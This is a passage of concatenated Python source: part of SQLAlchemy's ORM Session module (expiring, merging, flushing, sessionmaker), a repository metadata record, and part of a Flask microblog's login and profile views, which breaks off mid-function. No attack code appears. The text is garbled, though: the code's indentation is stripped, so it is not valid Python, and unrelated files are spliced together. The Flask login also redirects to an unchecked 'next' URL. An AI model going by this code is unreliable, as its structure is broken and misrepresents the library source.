"""Expire the attributes on an instance.
Marks the attributes of an instance as out of date. When an expired
attribute is next accessed, a query will be issued to the
:class:`.Session` object's current transactional context in order to
load all expired attributes for the given instance. Note that
a highly isolated transaction will return the same values as were
previously read in that same transaction, regardless of changes
in database state outside of that transaction.
To expire all objects in the :class:`.Session` simultaneously,
use :meth:`Session.expire_all`.
The :class:`.Session` object's default behavior is to
expire all state whenever the :meth:`Session.rollback`
or :meth:`Session.commit` methods are called, so that new
state can be loaded for the new transaction. For this reason,
calling :meth:`Session.expire` only makes sense for the specific
case that a non-ORM SQL statement was emitted in the current
transaction.
:param instance: The instance to be refreshed.
:param attribute_names: optional list of string attribute names
indicating a subset of attributes to be expired.
"""
try:
state = attributes.instance_state(instance)
except exc.NO_STATE:
raise exc.UnmappedInstanceError(instance)
self._expire_state(state, attribute_names)
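    # Illustrative sketch, not part of the original module: expiring attributes
    # as described above. ``user`` is a hypothetical persistent instance already
    # present in this session.
    #
    #     session.expire(user)                 # all attributes reload on next access
    #     session.expire(user, ['fullname'])   # only 'fullname' reloads on next access
    #     session.expire_all()                 # expire every persistent instance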
def _expire_state(self, state, attribute_names):
self._validate_persistent(state)
if attribute_names:
state._expire_attributes(state.dict, attribute_names)
else:
# pre-fetch the full cascade since the expire is going to
# remove associations
cascaded = list(state.manager.mapper.cascade_iterator(
'refresh-expire', state))
self._conditional_expire(state)
for o, m, st_, dct_ in cascaded:
self._conditional_expire(st_)
def _conditional_expire(self, state):
"""Expire a state if persistent, else expunge if pending"""
if state.key:
state._expire(state.dict, self.identity_map._modified)
elif state in self._new:
self._new.pop(state)
state._detach()
@util.deprecated("0.7", "The non-weak-referencing identity map "
"feature is no longer needed.")
def prune(self):
"""Remove unreferenced instances cached in the identity map.
Note that this method is only meaningful if "weak_identity_map" is set
to False. The default weak identity map is self-pruning.
Removes any object in this Session's identity map that is not
referenced in user code, modified, new or scheduled for deletion.
Returns the number of objects pruned.
"""
return self.identity_map.prune()
def expunge(self, instance):
"""Remove the `instance` from this ``Session``.
This will free all internal references to the instance. Cascading
will be applied according to the *expunge* cascade rule.
"""
try:
state = attributes.instance_state(instance)
except exc.NO_STATE:
raise exc.UnmappedInstanceError(instance)
if state.session_id is not self.hash_key:
raise sa_exc.InvalidRequestError(
"Instance %s is not present in this Session" %
state_str(state))
cascaded = list(state.manager.mapper.cascade_iterator(
'expunge', state))
self._expunge_state(state)
for o, m, st_, dct_ in cascaded:
self._expunge_state(st_)
def _expunge_state(self, state):
if state in self._new:
self._new.pop(state)
state._detach()
elif self.identity_map.contains_state(state):
self.identity_map.discard(state)
self._deleted.pop(state, None)
state._detach()
elif self.transaction:
self.transaction._deleted.pop(state, None)
def _register_newly_persistent(self, states):
for state in states:
mapper = _state_mapper(state)
# prevent against last minute dereferences of the object
obj = state.obj()
if obj is not None:
instance_key = mapper._identity_key_from_state(state)
if _none_set.issubset(instance_key[1]) and \
not mapper.allow_partial_pks or \
_none_set.issuperset(instance_key[1]):
raise exc.FlushError(
"Instance %s has a NULL identity key. If this is an "
"auto-generated value, check that the database table "
"allows generation of new primary key values, and "
"that the mapped Column object is configured to "
"expect these generated values. Ensure also that "
"this flush() is not occurring at an inappropriate "
"time, such aswithin a load() event."
% state_str(state)
)
if state.key is None:
state.key = instance_key
elif state.key != instance_key:
# primary key switch. use discard() in case another
# state has already replaced this one in the identity
# map (see test/orm/test_naturalpks.py ReversePKsTest)
self.identity_map.discard(state)
if state in self.transaction._key_switches:
orig_key = self.transaction._key_switches[state][0]
else:
orig_key = state.key
self.transaction._key_switches[state] = (
orig_key, instance_key)
state.key = instance_key
self.identity_map.replace(state)
statelib.InstanceState._commit_all_states(
((state, state.dict) for state in states),
self.identity_map
)
self._register_altered(states)
# remove from new last, might be the last strong ref
for state in set(states).intersection(self._new):
self._new.pop(state)
def _register_altered(self, states):
if self._enable_transaction_accounting and self.transaction:
for state in states:
if state in self._new:
self.transaction._new[state] = True
else:
self.transaction._dirty[state] = True
def _remove_newly_deleted(self, states):
for state in states:
if self._enable_transaction_accounting and self.transaction:
self.transaction._deleted[state] = True
self.identity_map.discard(state)
self._deleted.pop(state, None)
state.deleted = True
def add(self, instance, _warn=True):
"""Place an object in the ``Session``.
Its state will be persisted to the database on the next flush
operation.
Repeated calls to ``add()`` will be ignored. The opposite of ``add()``
is ``expunge()``.
"""
if _warn and self._warn_on_events:
self._flush_warning("Session.add()")
try:
state = attributes.instance_state(instance)
except exc.NO_STATE:
raise exc.UnmappedInstanceError(instance)
self._save_or_update_state(state)
def add_all(self, instances):
"""Add the given collection of instances to this ``Session``."""
if self._warn_on_events:
self._flush_warning("Session.add_all()")
for instance in instances:
self.add(instance, _warn=False)
def _save_or_update_state(self, state):
self._save_or_update_impl(state)
mapper = _state_mapper(state)
for o, m, st_, dct_ in mapper.cascade_iterator(
'save-update',
state,
halt_on=self._contains_state):
self._save_or_update_impl(st_)
def delete(self, instance):
"""Mark an instance as deleted.
The database delete operation occurs upon ``flush()``.
"""
if self._warn_on_events:
self._flush_warning("Session.delete()")
try:
state = attributes.instance_state(instance)
except exc.NO_STATE:
raise exc.UnmappedInstanceError(instance)
if state.key is None:
raise sa_exc.InvalidRequestError(
"Instance '%s' is not persisted" %
state_str(state))
if state in self._deleted:
return
# ensure object is attached to allow the
# cascade operation to load deferred attributes
# and collections
self._attach(state, include_before=True)
# grab the cascades before adding the item to the deleted list
# so that autoflush does not delete the item
# the strong reference to the instance itself is significant here
cascade_states = list(state.manager.mapper.cascade_iterator(
'delete', state))
self._deleted[state] = state.obj()
self.identity_map.add(state)
for o, m, st_, dct_ in cascade_states:
self._delete_impl(st_)
def merge(self, instance, load=True):
"""Copy the state of a given instance into a corresponding instance
within this :class:`.Session`.
:meth:`.Session.merge` examines the primary key attributes of the
source instance, and attempts to reconcile it with an instance of the
same primary key in the session. If not found locally, it attempts
to load the object from the database based on primary key, and if
none can be located, creates a new instance. The state of each
attribute on the source instance is then copied to the target instance.
The resulting target instance is then returned by the method; the
original source instance is left unmodified, and un-associated with the
:class:`.Session` if not already.
This operation cascades to associated instances if the association is
mapped with ``cascade="merge"``.
See :ref:`unitofwork_merging` for a detailed discussion of merging.
:param instance: Instance to be merged.
:param load: Boolean, when False, :meth:`.merge` switches into
a "high performance" mode which causes it to forego emitting history
events as well as all database access. This flag is used for
cases such as transferring graphs of objects into a :class:`.Session`
from a second level cache, or to transfer just-loaded objects
into the :class:`.Session` owned by a worker thread or process
without re-querying the database.
The ``load=False`` use case adds the caveat that the given
object has to be in a "clean" state, that is, has no pending changes
to be flushed - even if the incoming object is detached from any
:class:`.Session`. This is so that when
the merge operation populates local attributes and
cascades to related objects and
collections, the values can be "stamped" onto the
target object as is, without generating any history or attribute
events, and without the need to reconcile the incoming data with
any existing related objects or collections that might not
be loaded. The resulting objects from ``load=False`` are always
produced as "clean", so it is only appropriate that the given objects
should be "clean" as well, else this suggests a mis-use of the method.
"""
if self._warn_on_events:
self._flush_warning("Session.merge()")
_recursive = {}
if load:
# flush current contents if we expect to load data
self._autoflush()
object_mapper(instance) # verify mapped
autoflush = self.autoflush
try:
self.autoflush = False
return self._merge(
attributes.instance_state(instance),
attributes.instance_dict(instance),
load=load, _recursive=_recursive)
finally:
self.autoflush = autoflush
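    # Illustrative sketch, not part of the original module: merging a detached
    # object as described above. ``detached_user`` and ``cached_user`` are
    # hypothetical instances loaded by some other session or built from a cache.
    #
    #     merged = session.merge(detached_user)            # reconciles by primary key
    #     assert merged in session                         # the merged copy is persistent
    #     cached = session.merge(cached_user, load=False)  # no SQL; object must be "clean"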
def _merge(self, state, state_dict, load=True, _recursive=None):
mapper = _state_mapper(state)
if state in _recursive:
return _recursive[state]
new_instance = False
key = state.key
if key is None:
if not load:
raise sa_exc.InvalidRequestError(
"merge() with load=False option does not support "
"objects transient (i.e. unpersisted) objects. flush() "
"all changes on mapped instances before merging with "
"load=False.")
key = mapper._identity_key_from_state(state)
if key in self.identity_map:
merged = self.identity_map[key]
elif not load:
if state.modified:
raise sa_exc.InvalidRequestError(
"merge() with load=False option does not support "
"objects marked as 'dirty'. flush() all changes on "
"mapped instances before merging with load=False.")
merged = mapper.class_manager.new_instance()
merged_state = attributes.instance_state(merged)
merged_state.key = key
self._update_impl(merged_state)
new_instance = True
elif not _none_set.issubset(key[1]) or \
(mapper.allow_partial_pks and
not _none_set.issuperset(key[1])):
merged = self.query(mapper.class_).get(key[1])
else:
merged = None
if merged is None:
merged = mapper.class_manager.new_instance()
merged_state = attributes.instance_state(merged)
merged_dict = attributes.instance_dict(merged)
new_instance = True
self._save_or_update_state(merged_state)
else:
merged_state = attributes.instance_state(merged)
merged_dict = attributes.instance_dict(merged)
_recursive[state] = merged
# check that we didn't just pull the exact same
# state out.
if state is not merged_state:
# version check if applicable
if mapper.version_id_col is not None:
existing_version = mapper._get_state_attr_by_column(
state,
state_dict,
mapper.version_id_col,
passive=attributes.PASSIVE_NO_INITIALIZE)
merged_version = mapper._get_state_attr_by_column(
merged_state,
merged_dict,
mapper.version_id_col,
passive=attributes.PASSIVE_NO_INITIALIZE)
if existing_version is not attributes.PASSIVE_NO_RESULT and \
merged_version is not attributes.PASSIVE_NO_RESULT and \
existing_version != merged_version:
raise exc.StaleDataError(
"Version id '%s' on merged state %s "
"does not match existing version '%s'. "
"Leave the version attribute unset when "
"merging to update the most recent version."
% (
existing_version,
state_str(merged_state),
merged_version
))
merged_state.load_path = state.load_path
merged_state.load_options = state.load_options
for prop in mapper.iterate_properties:
prop.merge(self, state, state_dict,
merged_state, merged_dict,
load, _recursive)
if not load:
# remove any history
merged_state._commit_all(merged_dict, self.identity_map)
if new_instance:
merged_state.manager.dispatch.load(merged_state, None)
return merged
def _validate_persistent(self, state):
if not self.identity_map.contains_state(state):
raise sa_exc.InvalidRequestError(
"Instance '%s' is not persistent within this Session" %
state_str(state))
def _save_impl(self, state):
if state.key is not None:
raise sa_exc.InvalidRequestError(
"Object '%s' already has an identity - it can't be registered "
"as pending" % state_str(state))
self._before_attach(state)
if state not in self._new:
self._new[state] = state.obj()
state.insert_order = len(self._new)
self._attach(state)
def _update_impl(self, state, discard_existing=False):
if (self.identity_map.contains_state(state) and
state not in self._deleted):
return
if state.key is None:
raise sa_exc.InvalidRequestError(
"Instance '%s' is not persisted" %
state_str(state))
if state.deleted:
raise sa_exc.InvalidRequestError(
"Instance '%s' has been deleted. Use the make_transient() "
"function to send this object back to the transient state." %
state_str(state)
)
self._before_attach(state)
self._deleted.pop(state, None)
if discard_existing:
self.identity_map.replace(state)
else:
self.identity_map.add(state)
self._attach(state)
def _save_or_update_impl(self, state):
if state.key is None:
self._save_impl(state)
else:
self._update_impl(state)
def _delete_impl(self, state):
if state in self._deleted:
return
if state.key is None:
return
self._attach(state, include_before=True)
self._deleted[state] = state.obj()
self.identity_map.add(state)
def enable_relationship_loading(self, obj):
"""Associate an object with this :class:`.Session` for related
object loading.
.. warning::
:meth:`.enable_relationship_loading` exists to serve special
use cases and is not recommended for general use.
Accesses of attributes mapped with :func:`.relationship`
will attempt to load a value from the database using this
:class:`.Session` as the source of connectivity. The values
will be loaded based on foreign key values present on this
object - it follows that this functionality
        generally only works for many-to-one relationships.
The object will be attached to this session, but will
**not** participate in any persistence operations; its state
for almost all purposes will remain either "transient" or
"detached", except for the case of relationship loading.
Also note that backrefs will often not work as expected.
Altering a relationship-bound attribute on the target object
may not fire off a backref event, if the effective value
is what was already loaded from a foreign-key-holding value.
The :meth:`.Session.enable_relationship_loading` method supersedes
the ``load_on_pending`` flag on :func:`.relationship`. Unlike
that flag, :meth:`.Session.enable_relationship_loading` allows
an object to remain transient while still being able to load
related items.
To make a transient object associated with a :class:`.Session`
via :meth:`.Session.enable_relationship_loading` pending, add
it to the :class:`.Session` using :meth:`.Session.add` normally.
:meth:`.Session.enable_relationship_loading` does not improve
behavior when the ORM is used normally - object references should be
constructed at the object level, not at the foreign key level, so
that they are present in an ordinary way before flush()
proceeds. This method is not intended for general use.
.. versionadded:: 0.8
"""
state = attributes.instance_state(obj)
self._attach(state, include_before=True)
state._load_pending = True
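    # Illustrative sketch, not part of the original module: relationship loading
    # on a transient object as described above. ``Address`` and ``User`` are
    # hypothetical mapped classes where ``Address.user`` is a many-to-one.
    #
    #     address = Address(user_id=5)                   # transient, FK set manually
    #     session.enable_relationship_loading(address)
    #     print address.user                             # loads the User via this session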
def _before_attach(self, state):
if state.session_id != self.hash_key and \
self.dispatch.before_attach:
self.dispatch.before_attach(self, state.obj())
def _attach(self, state, include_before=False):
if state.key and \
state.key in self.identity_map and \
not self.identity_map.contains_state(state):
raise sa_exc.InvalidRequestError("Can't attach instance "
"%s; another instance with key %s is already "
"present in this session."
% (state_str(state), state.key))
if state.session_id and \
state.session_id is not self.hash_key and \
state.session_id in _sessions:
raise sa_exc.InvalidRequestError(
"Object '%s' is already attached to session '%s' "
"(this is '%s')" % (state_str(state),
state.session_id, self.hash_key))
if state.session_id != self.hash_key:
if include_before and \
self.dispatch.before_attach:
self.dispatch.before_attach(self, state.obj())
state.session_id = self.hash_key
if state.modified and state._strong_obj is None:
state._strong_obj = state.obj()
if self.dispatch.after_attach:
self.dispatch.after_attach(self, state.obj())
def __contains__(self, instance):
"""Return True if the instance is associated with this session.
The instance may be pending or persistent within the Session for a
result of True.
"""
try:
state = attributes.instance_state(instance)
except exc.NO_STATE:
raise exc.UnmappedInstanceError(instance)
return self._contains_state(state)
def __iter__(self):
"""Iterate over all pending or persistent instances within this
Session.
"""
return iter(list(self._new.values()) + list(self.identity_map.values()))
def _contains_state(self, state):
return state in self._new or self.identity_map.contains_state(state)
def flush(self, objects=None):
"""Flush all the object changes to the database.
Writes out all pending object creations, deletions and modifications
to the database as INSERTs, DELETEs, UPDATEs, etc. Operations are
automatically ordered by the Session's unit of work dependency
solver.
Database operations will be issued in the current transactional
context and do not affect the state of the transaction, unless an
error occurs, in which case the entire transaction is rolled back.
You may flush() as often as you like within a transaction to move
changes from Python to the database's transaction buffer.
For ``autocommit`` Sessions with no active manual transaction, flush()
will create a transaction on the fly that surrounds the entire set of
        operations in the flush.
:param objects: Optional; restricts the flush operation to operate
only on elements that are in the given collection.
This feature is for an extremely narrow set of use cases where
particular objects may need to be operated upon before the
full flush() occurs. It is not intended for general use.
"""
if self._flushing:
raise sa_exc.InvalidRequestError("Session is already flushing")
if self._is_clean():
return
try:
self._flushing = True
self._flush(objects)
finally:
self._flushing = False
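    # Illustrative sketch, not part of the original module: an explicit flush
    # within a transaction, as described above. ``User`` is a hypothetical
    # mapped class with a server-generated primary key.
    #
    #     user = User(name='ed')
    #     session.add(user)
    #     session.flush()          # INSERT is emitted; transaction still open
    #     print user.id            # generated primary key is now available
    #     session.commit()         # transaction is committed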
def _flush_warning(self, method):
util.warn(
"Usage of the '%s' operation is not currently supported "
"within the execution stage of the flush process. "
"Results may not be consistent. Consider using alternative "
"event listeners or connection-level operations instead."
% method)
def _is_clean(self):
return not self.identity_map.check_modified() and \
not self._deleted and \
not self._new
def _flush(self, objects=None):
dirty = self._dirty_states
if not dirty and not self._deleted and not self._new:
self.identity_map._modified.clear()
return
flush_context = UOWTransaction(self)
if self.dispatch.before_flush:
self.dispatch.before_flush(self, flush_context, objects)
# re-establish "dirty states" in case the listeners
# added
dirty = self._dirty_states
deleted = set(self._deleted)
new = set(self._new)
dirty = set(dirty).difference(deleted)
# create the set of all objects we want to operate upon
if objects:
# specific list passed in
objset = set()
for o in objects:
try:
state = attributes.instance_state(o)
except exc.NO_STATE:
raise exc.UnmappedInstanceError(o)
objset.add(state)
else:
objset = None
# store objects whose fate has been decided
processed = set()
# put all saves/updates into the flush context. detect top-level
# orphans and throw them into deleted.
if objset:
proc = new.union(dirty).intersection(objset).difference(deleted)
else:
proc = new.union(dirty).difference(deleted)
for state in proc:
is_orphan = (
_state_mapper(state)._is_orphan(state) and state.has_identity)
flush_context.register_object(state, isdelete=is_orphan)
processed.add(state)
# put all remaining deletes into the flush context.
if objset:
proc = deleted.intersection(objset).difference(processed)
else:
proc = deleted.difference(processed)
for state in proc:
flush_context.register_object(state, isdelete=True)
if not flush_context.has_work:
return
flush_context.transaction = transaction = self.begin(
subtransactions=True)
try:
self._warn_on_events = True
try:
flush_context.execute()
finally:
self._warn_on_events = False
self.dispatch.after_flush(self, flush_context)
flush_context.finalize_flush_changes()
if not objects and self.identity_map._modified:
len_ = len(self.identity_map._modified)
statelib.InstanceState._commit_all_states(
[(state, state.dict) for state in
self.identity_map._modified],
instance_dict=self.identity_map)
util.warn("Attribute history events accumulated on %d "
"previously clean instances "
"within inner-flush event handlers have been reset, "
"and will not result in database updates. "
"Consider using set_committed_value() within "
"inner-flush event handlers to avoid this warning."
% len_)
# useful assertions:
#if not objects:
# assert not self.identity_map._modified
#else:
# assert self.identity_map._modified == \
# self.identity_map._modified.difference(objects)
self.dispatch.after_flush_postexec(self, flush_context)
transaction.commit()
except:
with util.safe_reraise():
transaction.rollback(_capture_exception=True)
def is_modified(self, instance, include_collections=True,
passive=True):
"""Return ``True`` if the given instance has locally
modified attributes.
This method retrieves the history for each instrumented
attribute on the instance and performs a comparison of the current
value to its previously committed value, if any.
It is in effect a more expensive and accurate
version of checking for the given instance in the
:attr:`.Session.dirty` collection; a full test for
each attribute's net "dirty" status is performed.
E.g.::
return session.is_modified(someobject)
.. versionchanged:: 0.8
When using SQLAlchemy 0.7 and earlier, the ``passive``
flag should **always** be explicitly set to ``True``,
else SQL loads/autoflushes may proceed which can affect
the modified state itself:
``session.is_modified(someobject, passive=True)``\ .
In 0.8 and above, the behavior is corrected and
this flag is ignored.
A few caveats to this method apply:
* Instances present in the :attr:`.Session.dirty` collection may report
``False`` when tested with this method. This is because
the object may have received change events via attribute
mutation, thus placing it in :attr:`.Session.dirty`,
but ultimately the state is the same as that loaded from
the database, resulting in no net change here.
* Scalar attributes may not have recorded the previously set
value when a new value was applied, if the attribute was not loaded,
or was expired, at the time the new value was received - in these
cases, the attribute is assumed to have a change, even if there is
ultimately no net change against its database value. SQLAlchemy in
most cases does not need the "old" value when a set event occurs, so
it skips the expense of a SQL call if the old value isn't present,
based on the assumption that an UPDATE of the scalar value is
usually needed, and in those few cases where it isn't, is less
expensive on average than issuing a defensive SELECT.
The "old" value is fetched unconditionally upon set only if the
attribute container has the ``active_history`` flag set to ``True``.
This flag is set typically for primary key attributes and scalar
object references that are not a simple many-to-one. To set this
flag for any arbitrary mapped column, use the ``active_history``
argument with :func:`.column_property`.
:param instance: mapped instance to be tested for pending changes.
:param include_collections: Indicates if multivalued collections
should be included in the operation. Setting this to ``False`` is a
way to detect only local-column based properties (i.e. scalar columns
or many-to-one foreign keys) that would result in an UPDATE for this
instance upon flush.
:param passive:
.. versionchanged:: 0.8
Ignored for backwards compatibility.
When using SQLAlchemy 0.7 and earlier, this flag should always
be set to ``True``.
"""
state = object_state(instance)
if not state.modified:
return False
dict_ = state.dict
for attr in state.manager.attributes:
if \
(
not include_collections and
hasattr(attr.impl, 'get_collection')
) or not hasattr(attr.impl, 'get_history'):
continue
(added, unchanged, deleted) = \
attr.impl.get_history(state, dict_,
passive=attributes.NO_CHANGE)
if added or deleted:
return True
else:
return False
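    # Illustrative sketch, not part of the original module: checking for net
    # changes as described above. ``user`` is a hypothetical instance loaded
    # by this session.
    #
    #     user.name = user.name                   # attribute event fires, no net change
    #     assert user in session.dirty            # 'dirty' is optimistic
    #     assert not session.is_modified(user)    # history comparison sees no net change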
@property
def is_active(self):
"""True if this :class:`.Session` is in "transaction mode" and
is not in "partial rollback" state.
The :class:`.Session` in its default mode of ``autocommit=False``
is essentially always in "transaction mode", in that a
:class:`.SessionTransaction` is associated with it as soon as
it is instantiated. This :class:`.SessionTransaction` is immediately
replaced with a new one as soon as it is ended, due to a rollback,
commit, or close operation.
"Transaction mode" does *not* indicate whether
or not actual database connection resources are in use; the
:class:`.SessionTransaction` object coordinates among zero or more
actual database transactions, and starts out with none, accumulating
individual DBAPI connections as different data sources are used
within its scope. The best way to track when a particular
:class:`.Session` has actually begun to use DBAPI resources is to
implement a listener using the :meth:`.SessionEvents.after_begin`
method, which will deliver both the :class:`.Session` as well as the
target :class:`.Connection` to a user-defined event listener.
The "partial rollback" state refers to when an "inner" transaction,
typically used during a flush, encounters an error and emits a
rollback of the DBAPI connection. At this point, the
:class:`.Session` is in "partial rollback" and awaits for the user to
call :meth:`.Session.rollback`, in order to close out the
transaction stack. It is in this "partial rollback" period that the
:attr:`.is_active` flag returns False. After the call to
:meth:`.Session.rollback`, the :class:`.SessionTransaction` is replaced
with a new one and :attr:`.is_active` returns ``True`` again.
When a :class:`.Session` is used in ``autocommit=True`` mode, the
:class:`.SessionTransaction` is only instantiated within the scope
of a flush call, or when :meth:`.Session.begin` is called. So
:attr:`.is_active` will always be ``False`` outside of a flush or
:meth:`.Session.begin` block in this mode, and will be ``True``
within the :meth:`.Session.begin` block as long as it doesn't enter
"partial rollback" state.
        From all the above, it follows that the only purpose of this flag is
        for application frameworks that wish to detect if a "rollback" is
        necessary within a generic error handling routine, for
:class:`.Session` objects that would otherwise be in
"partial rollback" mode. In a typical integration case, this is also
not necessary as it is standard practice to emit
:meth:`.Session.rollback` unconditionally within the outermost
exception catch.
To track the transactional state of a :class:`.Session` fully,
use event listeners, primarily the :meth:`.SessionEvents.after_begin`,
:meth:`.SessionEvents.after_commit`,
:meth:`.SessionEvents.after_rollback` and related events.
"""
return self.transaction and self.transaction.is_active
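    # Illustrative sketch, not part of the original module: tracking when a
    # Session actually acquires DBAPI resources, as suggested above, via the
    # after_begin event. Assumes ``event`` is importable from sqlalchemy.
    #
    #     from sqlalchemy import event
    #
    #     @event.listens_for(Session, "after_begin")
    #     def receive_after_begin(session, transaction, connection):
    #         print "session %r began on %r" % (session, connection)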
identity_map = None
"""A mapping of object identities to objects themselves.
Iterating through ``Session.identity_map.values()`` provides
access to the full set of persistent objects (i.e., those
that have row identity) currently in the session.
See also:
:func:`.identity_key` - operations involving identity keys.
"""
@property
def _dirty_states(self):
"""The set of all persistent states considered dirty.
This method returns all states that were modified including
those that were possibly deleted.
"""
return self.identity_map._dirty_states()
@property
def dirty(self):
"""The set of all persistent instances considered dirty.
E.g.::
some_mapped_object in session.dirty
Instances are considered dirty when they were modified but not
deleted.
Note that this 'dirty' calculation is 'optimistic'; most
attribute-setting or collection modification operations will
mark an instance as 'dirty' and place it in this set, even if
there is no net change to the attribute's value. At flush
time, the value of each attribute is compared to its
previously saved value, and if there's no net change, no SQL
operation will occur (this is a more expensive operation so
it's only done at flush time).
To check if an instance has actionable net changes to its
attributes, use the :meth:`.Session.is_modified` method.
"""
return util.IdentitySet(
[state.obj()
for state in self._dirty_states
if state not in self._deleted])
@property
def deleted(self):
"The set of all instances marked as 'deleted' within this ``Session``"
return util.IdentitySet(list(self._deleted.values()))
@property
def new(self):
"The set of all instances marked as 'new' within this ``Session``."
return util.IdentitySet(list(self._new.values()))
class sessionmaker(_SessionClassMethods):
"""A configurable :class:`.Session` factory.
The :class:`.sessionmaker` factory generates new
:class:`.Session` objects when called, creating them given
the configurational arguments established here.
e.g.::
# global scope
Session = sessionmaker(autoflush=False)
# later, in a local scope, create and use a session:
sess = Session()
Any keyword arguments sent to the constructor itself will override the
"configured" keywords::
Session = sessionmaker()
# bind an individual session to a connection
sess = Session(bind=connection)
The class also includes a method :meth:`.configure`, which can
be used to specify additional keyword arguments to the factory, which
will take effect for subsequent :class:`.Session` objects generated.
This is usually used to associate one or more :class:`.Engine` objects
with an existing :class:`.sessionmaker` factory before it is first
used::
# application starts
Session = sessionmaker()
# ... later
engine = create_engine('sqlite:///foo.db')
Session.configure(bind=engine)
sess = Session()
    .. seealso::
:ref:`session_getting` - introductory text on creating
sessions using :class:`.sessionmaker`.
"""
def __init__(self, bind=None, class_=Session, autoflush=True,
autocommit=False,
expire_on_commit=True,
info=None, **kw):
"""Construct a new :class:`.sessionmaker`.
All arguments here except for ``class_`` correspond to arguments
accepted by :class:`.Session` directly. See the
:meth:`.Session.__init__` docstring for more details on parameters.
:param bind: a :class:`.Engine` or other :class:`.Connectable` with
which newly created :class:`.Session` objects will be associated.
:param class_: class to use in order to create new :class:`.Session`
objects. Defaults to :class:`.Session`.
:param autoflush: The autoflush setting to use with newly created
:class:`.Session` objects.
:param autocommit: The autocommit setting to use with newly created
:class:`.Session` objects.
:param expire_on_commit=True: the expire_on_commit setting to use
with newly created :class:`.Session` objects.
:param info: optional dictionary of information that will be available
via :attr:`.Session.info`. Note this dictionary is *updated*, not
replaced, when the ``info`` parameter is specified to the specific
:class:`.Session` construction operation.
.. versionadded:: 0.9.0
:param \**kw: all other keyword arguments are passed to the constructor
of newly created :class:`.Session` objects.
"""
kw['bind'] = bind
kw['autoflush'] = autoflush
kw['autocommit'] = autocommit
kw['expire_on_commit'] = expire_on_commit
kw['info'] = info
self.kw = kw
# make our own subclass of the given class, so that
# events can be associated with it specifically.
self.class_ = type(class_.__name__, (class_,), {})
def __call__(self, **local_kw):
"""Produce a new :class:`.Session` object using the configuration
established in this :class:`.sessionmaker`.
In Python, the ``__call__`` method is invoked on an object when
it is "called" in the same way as a function::
Session = sessionmaker()
session = Session() # invokes sessionmaker.__call__()
"""
for k, v in self.kw.items():
if k == 'info' and 'info' in local_kw:
d = v.copy()
d.update(local_kw['info'])
local_kw['info'] = d
else:
local_kw.setdefault(k, v)
return self.class_(**local_kw)
def configure(self, **new_kw):
"""(Re)configure the arguments for this sessionmaker.
e.g.::
Session = sessionmaker()
Session.configure(bind=create_engine('sqlite://'))
"""
self.kw.update(new_kw)
def __repr__(self):
return "%s(class_=%r%s)" % (
self.__class__.__name__,
self.class_.__name__,
", ".join("%s=%r" % (k, v) for k, v in self.kw.items())
)
def make_transient(instance):
"""Make the given instance 'transient'.
This will remove its association with any
session and additionally will remove its "identity key",
such that it's as though the object were newly constructed,
except retaining its values. It also resets the
"deleted" flag on the state if this object
had been explicitly deleted by its session.
Attributes which were "expired" or deferred at the
instance level are reverted to undefined, and
will not trigger any loads.
"""
state = attributes.instance_state(instance)
s = _state_session(state)
if s:
s._expunge_state(state)
# remove expired state and
# deferred callables
state.callables.clear()
if state.key:
del state.key
if state.deleted:
del state.deleted
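# Illustrative sketch, not part of the original module: fully detaching an
# object as described above. ``user`` is a hypothetical persistent instance
# and ``session`` its owning Session.
#
#     session.expunge(user)        # remove the object from the session
#     make_transient(user)         # drop its identity key; acts like a new object
#     session.add(user)            # would be INSERTed as a new row on the next flush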
def object_session(instance):
"""Return the ``Session`` to which instance belongs.
If the instance is not a mapped instance, an error is raised.
"""
try:
return _state_session(attributes.instance_state(instance))
except exc.NO_STATE:
raise exc.UnmappedInstanceError(instance)
_new_sessionid = util.counter()
|
{
"content_hash": "68850ecd6862f1912c2a4035dadcb2fd",
"timestamp": "",
"source": "github",
"line_count": 2359,
"max_line_length": 83,
"avg_line_length": 39.45485375158966,
"alnum_prop": 0.6021015536025098,
"repo_name": "alex/sqlalchemy",
"id": "21768626876478dfe6bd6d05b9c20b943ff159f3",
"size": "93306",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "lib/sqlalchemy/orm/session.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "45039"
},
{
"name": "CSS",
"bytes": "8431"
},
{
"name": "JavaScript",
"bytes": "244"
},
{
"name": "Python",
"bytes": "7479025"
}
],
"symlink_target": ""
}
|
from hashlib import md5
from datetime import datetime
from app import app
from app import oid, lm, db
from flask import render_template, flash, redirect, session, url_for, request, g
from flask.ext.login import login_user, logout_user, current_user, login_required
from forms import LoginForm
from models import User, ROLE_USER, ROLE_ADMIN
from forms import *
@app.route('/')
@app.route('/index/')
@login_required
def index():
user = g.user
posts = [
{'author':{'nickname':'John'},
'body':'Beautiful day in Portland!'
},
{'author':{'nickname':'Susan'},
'body':'Think in java'
}
]
return render_template(
'index.html',
title = 'Home',
user = user,
posts = posts,
)
@app.route('/logout/')
def logout():
logout_user()
return redirect(url_for('index'))
@app.before_request
def before_request():
g.user = current_user
if g.user.is_authenticated():
g.user.last_seen = datetime.utcnow()
db.session.add(g.user)
db.session.commit()
@app.route('/login/',methods = ['GET','POST'])
@oid.loginhandler
def login():
if g.user is not None and g.user.is_authenticated():
return redirect(url_for('index'))
form = LoginForm()
if form.validate_on_submit():
session['remember_me'] = form.remember_me.data
#flash('Login requested for OpenID="'+form.openid.data+'" remberme :'+str(form.remember_me.data))
return oid.try_login(form.openid.data,ask_for = ['nickname','email'])
return render_template('login.html',
title = 'SignIn',
form = form,
providers = app.config['OPENID_PROVIDERS'])
@lm.user_loader
def load_user(id):
return User.query.get(int(id))
@app.route('/edit/',methods = ['GET','POST'])
@login_required
def edit():
form = EditForm()
if form.validate_on_submit():
g.user.nickname = form.nickname.data
        g.user.about_me = form.about_me.data
db.session.add(g.user)
db.session.commit()
        flash('Your changes have been saved')
return redirect(url_for('edit'))
else:
form.nickname.data = g.user.nickname
        form.about_me.data = g.user.about_me
return render_template('edit.html',
form = form,
)
@oid.after_login
def after_login(resp):
if resp.email is None or resp.email == "":
        flash('Invalid login. Please try again.')
        return redirect(url_for('login'))
user = User.query.filter_by(email = resp.email).first()
if user is None:
nickname = resp.nickname
if nickname is None or nickname =="":
nickname = resp.email.split('@')[0]
user = User(nickname = nickname,email = resp.email,role = ROLE_USER)
db.session.add(user)
db.session.commit()
remember_me = False
if 'remember_me' in session:
remember_me = session['remember_me']
session.pop('remember_me',None)
login_user(user,remember = remember_me)
return redirect(request.args.get('next') or url_for('index'))
@app.route('/user/<nickname>')
@login_required
def user(nickname):
user = User.query.filter_by(nickname = nickname).first()
    if user is None:
        flash('User ' + nickname + ' not found!')
return redirect(url_for('index'))
posts = [
{'author':user,
